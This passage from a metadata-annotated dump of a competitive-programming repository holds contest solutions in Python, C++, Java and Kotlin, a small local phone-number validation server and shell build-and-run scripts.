}\n}" }, { "alpha_fraction": 0.3481481373310089, "alphanum_fraction": 0.3870370388031006, "avg_line_length": 30.764705657958984, "blob_id": "93f86b952ba09fceb08ab31dc410a554cfb03885", "content_id": "2074d7c4b2c6e97236945e7c2231ed6ff3298616", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 540, "license_type": "no_license", "max_line_length": 33, "num_lines": 17, "path": "/trash/postfixlogic.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "f = open(\"postfixlogic.out\", \"w\")\nf.write(\"2\\n\")\nf.write(\"S 0 _ -> S _ > 0 >\\n\")\nf.write(\"S 1 _ -> S _ > 1 >\\n\")\nf.write(\"S o _ -> S o ^ _ <\\n\")\nf.write(\"S a _ -> S a ^ _ <\\n\")\nf.write(\"S o 0 -> S _ > _ ^\\n\")\nf.write(\"S a 1 -> S _ > _ ^\\n\")\nf.write(\"S a 0 -> and a ^ _ <\\n\")\nf.write(\"S o 1 -> or o ^ _ <\\n\")\nf.write(\"or o 0 -> S _ > 1 >\\n\")\nf.write(\"or o 1 -> S _ > 1 >\\n\")\nf.write(\"and a 0 -> S _ > 0 >\\n\")\nf.write(\"and a 1 -> S _ > 0 >\\n\")\nf.write(\"S _ _ -> S _ ^ _ <\\n\")\nf.write(\"S _ 0 -> AC 0 ^ _ ^\\n\")\nf.write(\"S _ 1 -> AC 1 ^ _ ^\\n\")\n" }, { "alpha_fraction": 0.4545454680919647, "alphanum_fraction": 0.5454545617103577, "avg_line_length": 21, "blob_id": "d3c93979440b93650ec71ef41bb5b4e36124212e", "content_id": "929f670d4e602b16051cf5fe5920eaca8aac5a60", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 22, "license_type": "no_license", "max_line_length": 21, "num_lines": 1, "path": "/2015/tpp/A.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "print(\"1 1 \"+input())\n" }, { "alpha_fraction": 0.5204473733901978, "alphanum_fraction": 0.548409640789032, "avg_line_length": 27.326732635498047, "blob_id": "a27633479d64f3f06f71be1252c5c4723d7f7b76", "content_id": "ae9aff1fcbd20edc143fa4a3fb333b3419e713a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2861, "license_type": "no_license", "max_line_length": 81, "num_lines": 101, "path": "/examples/server.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import json\nimport logging\nimport re\nimport sys\nimport urllib.parse\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\nfrom typing import NamedTuple, List, Tuple\n\nlog = logging.getLogger(__name__)\nlog.setLevel(logging.INFO)\nlog.addHandler(logging.FileHandler('solution.log'))\n\n\nclass PhoneParser:\n PHONE_CODES = [982, 986, 912, 934]\n REGEXP = [\n re.compile(r'^\\+7 (\\d{3}) (\\d{3}) (\\d{2})(\\d{2})$'),\n re.compile(r'^\\+7 (\\d{3}) (\\d{3}) (\\d{2}) (\\d{2})$'),\n re.compile(r'^\\+7 \\((\\d{3})\\) (\\d{3})-(\\d{2})(\\d{2})$'),\n re.compile(r'^\\+7(\\d{3})(\\d{3})(\\d{2})(\\d{2})$'),\n re.compile(r'^8 (\\d{3}) (\\d{3}) (\\d{2})(\\d{2})$'),\n re.compile(r'^8 (\\d{3}) (\\d{3}) (\\d{2}) (\\d{2})$'),\n re.compile(r'^8 \\((\\d{3})\\) (\\d{3})-(\\d{2})(\\d{2})$'),\n re.compile(r'^8(\\d{3})(\\d{3})(\\d{2})(\\d{2})$'),\n ]\n\n def __init__(self, raw):\n self.raw = raw\n\n def parse(self):\n m = self.match()\n if not m:\n log.info('could not match')\n return ''\n\n code, *parts = m.groups()\n if int(code) not in self.PHONE_CODES:\n log.info('did not match code')\n return ''\n\n return f'+7-{code}-{parts[0]}-{parts[1]}{parts[2]}'\n\n def match(self):\n for pattern in self.REGEXP:\n m = pattern.match(self.raw)\n log.info(f'result matching: raw={self.raw} pattern={pattern}, m={m}')\n if m:\n return m\n\n\nclass Response(NamedTuple):\n code: int\n headers: List[Tuple[str, str]]\n message: str\n\n\nclass Handler(BaseHTTPRequestHandler):\n def do_GET(self):\n query = urllib.parse.urlparse(self.path)\n log.info('query: %s', query)\n if query.path == '/ping':\n response = ping()\n elif query.path == '/shutdown':\n sys.exit()\n else:\n response = validate(query)\n\n self.send_response(response.code)\n for name, value in response.headers:\n self.send_header(name, value)\n self.end_headers()\n\n self.wfile.write(response.message.encode())\n\n\ndef ping():\n return Response(200, [], '')\n\n\ndef validate(query: urllib.parse.ParseResult) -> Response:\n if query.path != '/validatePhoneNumber':\n return Response(404, [], '')\n\n phone_number = urllib.parse.parse_qs(query.query).get('phone_number')\n if phone_number is None or len(phone_number) != 1:\n return Response(400, [], '')\n\n log.info('phone_number: %s', phone_number)\n headers = [('Content-Type', 'application/json')]\n\n normalized = PhoneParser(phone_number[0]).parse()\n if normalized:\n result = {'status': True, 'normalized': normalized}\n else:\n result = {'status': False}\n\n return Response(200, headers, json.dumps(result))\n\n\nserver = HTTPServer(('127.0.0.1', 7777), Handler)\nserver.serve_forever()\n" }, { "alpha_fraction": 0.46641790866851807, "alphanum_fraction": 0.5, "avg_line_length": 23.363636016845703, "blob_id": "bb17e9b1e92b2a60328e5147793c4db44bab0d0e", "content_id": "ca11ba9dd5a00b38f5092c2320300c64f4938f49", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 536, "license_type": "no_license", "max_line_length": 128, "num_lines": 22, "path": "/2015/tpp/E.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import math\n\na, b = map(float, input().split())\nif b < a:\n t = a\n a = b\n b = t\nf = 'abs(' + input().replace('^', '**').replace('sin', 'math.sin').replace('cos', 'math.cos').replace('sqrt', 'math.sqrt') + ')'\ndef integrant(x):\n return eval(f)\ndef simps(xi, xi1):\n return (xi1 - xi) * (integrant(xi) + 4 * integrant((xi + xi1) / 2) + integrant(xi1)) / 6\n\nanswer = 0\nn = 4229\nd = max((b - a) / n, 0.001)\nx = a\nif a != b:\n while x < b:\n answer += simps(x, x + d)\n x = min(b, x + d)\nprint('%.20f' % (answer))\n" }, { "alpha_fraction": 0.39635801315307617, "alphanum_fraction": 0.4064316153526306, "avg_line_length": 31.262500762939453, "blob_id": "ee5f3d7d3ab799ef31273b1612bd128be6b8ed5c", "content_id": "526e9f68ade0eb463a2e10aa92514339ac41af75", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2581, "license_type": "no_license", "max_line_length": 928, "num_lines": 80, "path": "/2013/2013RCC3/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#define enter printf(\"\\n\");\n\nusing namespace std;\nint INF = 1000000007;\nvector<int> a;\nint n, m;\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n read(x);\n f.push_back(x);\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');\n}\n\nint main()\n{\n// freopen(\"input.txt\", \"r\", stdin);\n int t;\n readln(t);\n for (int tt = 0; tt < t; tt++)\n {\n long long ans = 1;\n a.clear();\n char c;\n int count = 0;\n while (true)\n {\n scanf(\"%c\", &c);\n if (c == '\\n')\n break;\n if (c == '?')\n count++;\n a.push_back(c);\n }\n n = a.size() / 2;\n bool f = false;\n for (int i = 0; i < n; i++)\n {\n if (a[i] == a[i + n] && a[i] != '?')\n continue;\n if (a[i] != a[i + n] && a[i] != '?' && a[i + n] != '?')\n {\n ans = 1;\n f = true;\n break;\n }\n if (a[i] == '?' && a[i + n] == '?')\n ans = (ans * 2) % INF,\n count--;\n }\n if (f)\n {\n for (int i = 0; i < count; i++)\n ans = (ans * 2) % INF;\n cout << ans << \"\\n\";\n continue;\n }\n for (int i = 0; i < count; i++)\n ans = (ans * 2) % INF;\n\n cout << ans - 1<< \"\\n\";\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.4621141254901886, "alphanum_fraction": 0.48900842666625977, "avg_line_length": 31.393939971923828, "blob_id": "46c139017131ac5ad8e24f0d3438b01ec5397a17", "content_id": "a8ab5c428c4ecb36b6de327bf8d555e38d4f693b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4276, "license_type": "no_license", "max_line_length": 174, "num_lines": 132, "path": "/2020/gcjQual/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(a.size())\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\n\nvoid run(int n)\n{\n auto ask = [&](int i) {\n writeln(i + 1);\n cout.flush();\n ints(x);\n cerr << \"Asking \" << i + 1 << \", got \" << x << endl;\n return x;\n };\n string answer(n, '!');\n\n set<int> notAsked;\n fori(n / 2) notAsked.insert(i);\n\n vector<vector<int>> d(2, vector<int>(2, -1));\n for (int request = 0; !notAsked.empty(); request += 2)\n {\n cerr << answer << \" Request \" << request << endl;\n if (request % 10 == 0)\n {\n bool flipped = false;\n bool reversed = false;\n auto get = [&](int i, int j, int need) {\n request++;\n int x = d[i][j];\n int q = ask(x);\n return q != need;\n };\n if (d[0][0] != -1)\n flipped = get(0, 0, 0);\n else if (d[1][1] != -1)\n flipped = get(1, 1, 1);\n if (flipped)\n {\n for (char& c: answer)\n c ^= 1;\n swap(d[0][0], d[1][1]);\n swap(d[0][1], d[1][0]);\n }\n if (d[0][1] != -1)\n reversed = get(0, 1, 0);\n else if (d[1][0] != -1)\n reversed = get(1, 0, 1);\n if (reversed)\n {\n reverse(all(answer));\n swap(d[0][1], d[1][0]);\n }\n if (request % 2 == 1)\n request++,\n ask(0);\n cerr << flipped << \" \" << reversed << endl;\n cerr << answer << endl;\n }\n int x;\n do\n x = rand() % (n / 2);\n while (!notAsked.count(x));\n int q = ask(x);\n int w = ask(n - x - 1);\n answer[x] = q + '0';\n answer[n - x - 1] = w + '0';\n d[q][w] = x;\n notAsked.erase(x);\n notAsked.erase(n - x - 1);\n }\n\n writeln(answer);\n string verdict;\n readln(verdict);\n if (verdict == \"Y\")\n return;\n else\n exit(29);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n ints(t, b);\n fori(t) run(b);\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.6341463327407837, "alphanum_fraction": 0.6546854972839355, "avg_line_length": 17.11627960205078, "blob_id": "41fec3f96eba317073e690c5929bb0d8b4359e32", "content_id": "ba7a20d1081a4bc9455bf776e540b3d63f83141e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 779, "license_type": "no_license", "max_line_length": 223, "num_lines": 43, "path": "/trains/ai/cpp-cgdk/runallmaps.sh", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "name=\"MyStrategy\"\n\nif [ ! -f $name.cpp ]\nthen\n echo Unable to find $name.cpp > compilation.log\n exit 1\nfi\n\nrm -f $name\n\nfiles=\"\"\n\nfor i in *.cpp\ndo\n files=\"$files $i\"\ndone\n\nfor i in model/*.cpp\ndo\n files=\"$files $i\"\ndone\n\nfor i in csimplesocket/*.cpp\ndo\n files=\"$files $i\"\ndone\n\ng++ -std=c++11 -I/home/igorjan/206round/staff -static -fno-optimize-sibling-calls -fno-strict-aliasing -DONLINE_JUDGE -D_LINUX -lm -s -x c++ -O2 -Wall -Wno-unknown-pragmas -Ddebug=1 -Dvis=1 -o $name $files 2>compilation.log\n\nfor i in {0..13};\ndo\n cd runner\n mv local-runner.properties backup\n echo maps/map0$i\n cp maps/map0$i \"local-runner.properties\"\n ./local-runner.sh &\n sleep 2\n cd ..\n ./MyStrategy\n read\ndone\ncd runner\nmv backup local-runner.properties\n" }, { "alpha_fraction": 0.6558252573013306, "alphanum_fraction": 0.6650485396385193, "avg_line_length": 24.762500762939453, "blob_id": "69b4f03d1235509175cd1dc35d52908adb1f3195", "content_id": "3665dc817e1c751c4b2ec1ef91e6d4b4acdf6995", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2060, "license_type": "no_license", "max_line_length": 100, "num_lines": 80, "path": "/trash/tpproger/tpB.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.io.BufferedReader;\nimport java.io.IOException;\nimport java.io.InputStreamReader;\nimport java.io.PrintWriter;\nimport java.util.Calendar;\nimport java.util.HashMap;\nimport java.util.Map;\nimport java.util.StringTokenizer;\n\npublic class tpB {\n\n\tstatic BufferedReader bufferedReader;\n\tstatic StringTokenizer stringTokenizer;\n\tstatic PrintWriter out;\n\tstatic String task = \"a\";\n\n\tvoid writeln(Object o) {\n\t\tSystem.out.println(o);\n\t}\n\n\tvoid run() {\n\t\tint n = nextInt();\n\t\tMap<String, Integer> map = new HashMap<>();\n\t\tString city, time;\n\t\tint t;\n\t\tfor (int i = 0; i < n; i++) {\n\t\t\tcity = next();\n\t\t\ttime = next().substring(3);\n\t\t\tt = Integer.parseInt(time);\n\t\t\tmap.put(city, t);\n\t\t}\n\t\tString from, to, begin;\n\t\tint m = nextInt();\n\t\tfor (int i = 0; i < m; i++) {\n\t\t\tfrom = next();\n\t\t\tto = from.substring(from.indexOf('-') + 1);\n\t\t\tfrom = from.substring(0, from.indexOf('-'));\n\t\t\tbegin = next();\n\t\t\ttime = next();\n\t\t\tCalendar c = Calendar.getInstance();\n\t\t\tc.set(0, 0, 0, Integer.parseInt(begin.substring(0, 2)), Integer.parseInt(begin.substring(3)), 0);\n\t\t\tc.add(Calendar.HOUR, Integer.parseInt(time.substring(0, 2)) + map.get(to) - map.get(from));\n\t\t\tc.add(Calendar.MINUTE, Integer.parseInt(time.substring(3)));\n\t\t\twriteln(c.getTime().toString().substring(11, 16));\n\t\t}\n\t}\n\n\tint nextInt() {\n\t\treturn Integer.parseInt(next());\n\t}\n\n\tlong nextLong() {\n\t\treturn Long.parseLong(next());\n\t}\n\n\tString next() {\n\t\twhile (stringTokenizer == null || !stringTokenizer.hasMoreTokens()) {\n\t\t\tstringTokenizer = new StringTokenizer(nextLine());\n\t\t}\n\t\treturn stringTokenizer.nextToken();\n\t}\n\n\tString nextLine() {\n\t\ttry {\n\t\t\treturn bufferedReader.readLine();\n\t\t} catch (IOException err) {\n\t\t\treturn null;\n\t\t}\n\t}\n\n\tpublic static void main(String[] args) throws IOException {\n\t\tbufferedReader = new BufferedReader(new InputStreamReader(System.in));\n\t\tout = new PrintWriter(System.out);\n\t\t// bufferedReader = new BufferedReader(new FileReader(task + \".txt\"));\n\t\t// out = new PrintWriter(new File(task + \".out\"));\n\t\tnew tpB().run();\n\t\tout.close();\n\t\tbufferedReader.close();\n\t}\n}" }, { "alpha_fraction": 0.3663194477558136, "alphanum_fraction": 0.4019097089767456, "avg_line_length": 21.58823585510254, "blob_id": "6a9e1d9033850c0a5c80f806fc8577c033142d96", "content_id": "aa7986cc3e9bdbb3b0a45b01443cdb77dcd888f3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1152, "license_type": "no_license", "max_line_length": 64, "num_lines": 51, "path": "/trains/neerc/neerc.ifmo.ru.train.2015.10.13/C.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import re\ns = input()\nok = s.find('0') == -1\n\ns = s.replace('-', '0')\nt = re.sub(r'\\d', 'd', s).split('|')\ns = s.replace(' ', '')\n\nok &= len(t) == 12 and t[0] == '' and t[-1] == ''\nt = t[1:-1]\ndic = ['dd', 'd/', 'X ']\nlast = ['dd', 'd/d', 'd/X', 'Xdd', 'Xd/', 'XXd', 'XXX']\n\nif ok:\n for i in range(9):\n ok &= len(t[i]) == 2 and t[i] in dic\nif ok:\n ok &= (len(t[-1]) == 2 or len(t[-1]) == 3) and t[-1] in last\n\nprev = 0\ncount = 0\nvalues = []\nfor i in range(len(s)):\n if s[i] == 'X':\n values.append(10)\n prev = 0\n elif s[i] == '/':\n values.append(58 - ord(s[i - 1]))\n prev = 0\n elif s[i] == '|':\n prev = 0\n else:\n values.append(ord(s[i]) - 48)\n if prev >= 1 and prev <= 9 and values[-1] + prev >= 10:\n ok = False\n prev = values[-1]\n\nans = sum(values)\nj = 0\nfor i in range(len(s)):\n if s[i] == '|':\n count += 1\n elif ok:\n if count <= 9:\n if s[i] == 'X':\n ans += values[j + 1] + values[j + 2]\n elif s[i] == '/':\n ans += values[j + 1]\n j += 1\n\nprint(\"YES\\n\" + str(ans) if ok else \"NO\")\n" }, { "alpha_fraction": 0.5428571701049805, "alphanum_fraction": 0.5657142996788025, "avg_line_length": 16.5, "blob_id": "4ad2a366979864bf5d7bf31bd6705ca77f85a9ee", "content_id": "3bd745ecf4bcfaff5d801c5219da6395ea9a2549", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 175, "license_type": "no_license", "max_line_length": 58, "num_lines": 10, "path": "/scripts/cloneRep.sh", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\n\nif [ -z \"$1\" ]; then\n echo \"Rep isn't set\";\n exit 1;\nfi\n\nsurname=$(findSurname.py \"$1\")\n\ngit clone \"$1\" \"$surname\" && cd \"$surname\" && buildHere.sh\n" }, { "alpha_fraction": 0.44569289684295654, "alphanum_fraction": 0.45205992460250854, "avg_line_length": 23.504587173461914, "blob_id": "006cbe2c9629fb192c826e1369f2d8f42e1479e3", "content_id": "58a6462d1501ef9170b15fd4b28a02c28ecf3892", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 2670, "license_type": "no_license", "max_line_length": 81, "num_lines": 109, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.10.21/D.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.io.*;\nimport java.util.*;\nimport java.math.BigInteger;\nimport java.util.Map.Entry;\nimport static java.lang.Math.*;\n \npublic class D {\n \n final static String task_name = \"defense\";\n \n void run() {\n \n int w = nextInt(), h = nextInt(), n = nextInt() + 2, ans = 0;\n int[] x = new int[n], y = new int[n];\n x[1] = w + 1;\n y[1] = h + 1;\n \n for (int i = 2; i < n; i++) {\n x[i] = nextInt();\n y[i] = nextInt();\n }\n \n Arrays.sort(x);\n Arrays.sort(y);\n \n for (int i = 1; i < n; i++) {\n int dx = x[i] - x[i - 1] - 1;\n for (int j = 1; dx > 0 && j < n; j++) {\n int dy = y[j] - y[j - 1] - 1;\n if (dx * dy > ans) {\n ans = dx * dy;\n }\n }\n }\n out.println(ans);\n }\n \n int[][] nextMatrix(int n, int m) {\n int[][] matrix = new int[n][m];\n for (int i = 0; i < n; i++)\n for (int j = 0; j < m; j++)\n matrix[i][j] = nextInt();\n return matrix;\n }\n \n String next() {\n while (!st.hasMoreTokens())\n st = new StringTokenizer(nextLine());\n return st.nextToken();\n }\n \n boolean hasNext() {\n while (!st.hasMoreTokens()) {\n String line = nextLine();\n if (line == null) {\n return false;\n }\n st = new StringTokenizer(line);\n }\n return true;\n }\n \n int[] nextArray(int n) {\n int[] array = new int[n];\n for (int i = 0; i < n; i++) {\n array[i] = nextInt();\n }\n return array;\n }\n \n int nextInt() {\n return Integer.parseInt(next());\n }\n \n long nextLong() {\n return Long.parseLong(next());\n }\n \n double nextDouble() {\n return Double.parseDouble(next());\n }\n \n String nextLine() {\n try {\n return in.readLine();\n } catch (IOException err) {\n return null;\n }\n }\n \n static PrintWriter out;\n static BufferedReader in;\n static StringTokenizer st = new StringTokenizer(\"\");\n static Random rnd = new Random();\n \n public static void main(String[] args) throws IOException {\n if (task_name == null) {\n in = new BufferedReader(new InputStreamReader(System.in));\n out = new PrintWriter(System.out);\n } else {\n in = new BufferedReader(new FileReader(new File(task_name + \".in\")));\n out = new PrintWriter(new FileWriter(new File(task_name + \".out\")));\n }\n \n new D().run();\n out.close();\n in.close();\n }\n}" }, { "alpha_fraction": 0.4354221820831299, "alphanum_fraction": 0.44983819127082825, "avg_line_length": 28.05128288269043, "blob_id": "af84568894905539cc21c9437afa0e16d2a6acf7", "content_id": "3419d7e60b29cbf5babeadee0a601291dfb6feb7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 3399, "license_type": "no_license", "max_line_length": 102, "num_lines": 117, "path": "/CodeForce/1571/F.kt", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.io.PrintWriter// {{{\nimport kotlin.math.*\nimport kotlin.collections.*// }}}\n\nprivate fun run() {\n val (n, m) = readln()\n var a = Array(n) { readln() }.withIndex().sortedWith(compareBy({ it.value[1] }, { -it.value[0] }))\n val ans = IntArray(n) { -1 }\n var prev = 1\n for (i in a.indices)\n if (a[i].value[1] == 1) {\n ans[a[i].index] = prev\n prev += a[i].value[0]\n }\n a = a.dropWhile { it.value[1] == 1 }\n val sum = a.sumOf { it.value[0] }\n val y = sum / 2 + 1\n if (sum > m)\n return writeln(-1)\n var pprev = prev + 1\n val dp = BooleanArray(y) { false }\n val par = IntArray(y) { -1 }\n dp[0] = true\n for (i in a.indices) {\n val x = a[i].value[0]\n\n for (j in y - 1 downTo 0)\n if (dp[j] and (j + x < y))\n if (!dp[j + x]) {\n dp[j + x] = true\n par[j + x] = i\n }\n }\n for (i in y - 1 downTo 0) {\n if (dp[i]) {\n if (i < sum - i) {\n val t = prev\n prev = pprev\n pprev = t\n }\n var p = i\n while (p > 0) {\n val index = par[p]\n ans[a[index].index] = prev\n prev += a[index].value[0] * 2\n p -= a[index].value[0]\n }\n\n for (j in a.indices)\n if (ans[a[j].index] == -1) {\n ans[a[j].index] = pprev\n pprev += a[j].value[0] * 2\n }\n return if (max(prev, pprev) > m + 2)\n writeln(-1)\n else\n writeln(ans.joinToString(\" \"))\n }\n }\n\n}\n\nprivate fun PrintWriter.readSolveWrite() {\n// val (t) = readln()\n repeat(1) {\n run()\n }\n}\n\nprivate fun ok(x: Boolean) = if (x) 1 else 0// {{{\n\nprivate fun writeln(vararg strings: Any) =\n println(strings.map { if (it is IntArray) it.joinToString(\" \") else it }.joinToString(\" \"))\n\nprivate fun readln() = getIntArray()\n\nprivate fun getIntArray() = readLine()!!.splitToIntArray()\n\nprivate fun bufferOut(block: PrintWriter.() -> Unit) = PrintWriter(System.out).use { block(it) }\n\nfun main() = bufferOut { readSolveWrite() }\n\nprivate fun String.splitToIntArray(): IntArray {\n val n = length\n if (n == 0) return IntArray(0) // EMPTY\n var res = IntArray(4)\n var m = 0\n var i = 0\n while (true) {\n var cur = 0\n var neg = false\n var c = get(i) // expecting number, IOOB if there is no number\n if (c == '-') {\n neg = true\n i++\n c = get(i) // expecting number, IOOB if there is no number\n }\n while (true) {\n @OptIn(kotlin.ExperimentalStdlibApi::class)\n val d = c.code - '0'.code\n require(d in 0..9) { \"Unexpected character '$c' at $i\" }\n require(cur >= Integer.MIN_VALUE / 10) { \"Overflow at $i\" }\n cur = cur * 10 - d\n require(cur <= 0) { \"Overflow at $i\" }\n i++\n if (i >= n) break\n c = get(i)\n if (c == ' ') break\n }\n if (m >= res.size) res = res.copyOf(res.size * 2)\n res[m++] = if (neg) cur else (-cur).also { require(it >= 0) { \"Overflow at $i\" } }\n if (i >= n) break\n i++\n }\n if (m < res.size) res = res.copyOf(m)\n return res\n}// }}}\n" }, { "alpha_fraction": 0.48453325033187866, "alphanum_fraction": 0.49384066462516785, "avg_line_length": 18.226316452026367, "blob_id": "c19b7a8531889c15b6de577826a960749e545ad5", "content_id": "879b9573ef475cce051e794932df01ccd0ac37e3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3653, "license_type": "no_license", "max_line_length": 163, "num_lines": 190, "path": "/CodeForce/0400/C.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n\n#define enter printf(\"\\n\")\n#define pb push_back\n#define ll long long\n#define fors(it, r) for (set<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forvit(it, r) for (vector<int>::iterator it = r.begin(); it != r.end(); it++)\n#define forv(i, vector) for (int i = 0; i < vector.size(); i++)\n#define forn(i, n) for (int i = 0; i < n; i++)\n#define forn1(i, n) for (int i = 1; i < n; i++)\n#define fori(n) for (int i = 0; i < n; i++)\n#define forj(n) for (int j = 0; j < n; j++)\n#define vi vector<int>\n#define vll vector<long long>\n#define pii pair<int, int>\n\nusing namespace std;\nint INF = 1000000007;\nstring FILENAME = \"input\";\nstring FILEINPUT = FILENAME;\n\nvoid writeln(int a);void writeln(int a, int b); void writeln(int a, int b, int c); void writeln(int a, int b, int c, int d); void writeln(vector<int>& a);\nvoid readln(int& a);void readln(int& a, int& b);void readln(int& a, int& b, int& c);void readln(int& a, int& b, int& c, int& d);void readln(vector<int>& a, int n);\n\nstruct graph\n{\n vector<vector<int>> edges;\n int n;\n graph(int n);\n graph(int n, int m);\n graph();\n void createGraph(int n);\n void add_edge(int u, int v);\n void add_or_edge(int u, int v);\n void writelnMatrix();\n void writeln();\n};\n\nint n, m, k, x, y, p, z;\nvi a;\n\nvoid run()\n{\n readln(n, m, x, y);\n readln(z, p);\n x %= 4;\n y %= 2;\n z %= 4;\n int t, e;\n vector<pii> a;\n fori(p)\n readln(t, e),\n a.pb({t, e});\n fori(p)\n forj(x)\n a[i] = {a[i].second, (j % 2 == 0 ? n : m) - a[i].first + 1};\n if (x % 2)\n swap(n, m);\n if (y)\n fori(p)\n a[i] = {a[i].first, m - a[i].second + 1};\n fori(p)\n forj(z)\n a[i] = {(j % 2 == 0 ? m : n) - a[i].second + 1, a[i].first};\n fori(p)\n writeln(a[i].first, a[i].second);\n}\n\nint main()\n{\n //freopen(FILEINPUT.append(\".in\").c_str(), \"r\", stdin);\n //freopen(FILENAME.append(\".out\").c_str(), \"w\", stdout);\n run();\n return 0;\n}\n\ngraph::graph(int n)\n{\n this->n = n;\n edges.resize(n);\n int t;\n fori(n)\n {\n edges[i].resize(n);\n forj(n)\n readln(t),\n edges[i][j] = t == '1';\n }\n}\n\ngraph::graph(int n, int m)\n{\n this->n = n;\n edges.resize(n);\n int u, v;\n fori(m)\n readln(u, v),\n add_edge(u - 1, v - 1);\n}\n\nvoid graph::add_edge(int u, int v)\n{\n edges[u].pb(v);\n}\n\nvoid graph::add_or_edge(int u, int v)\n{\n 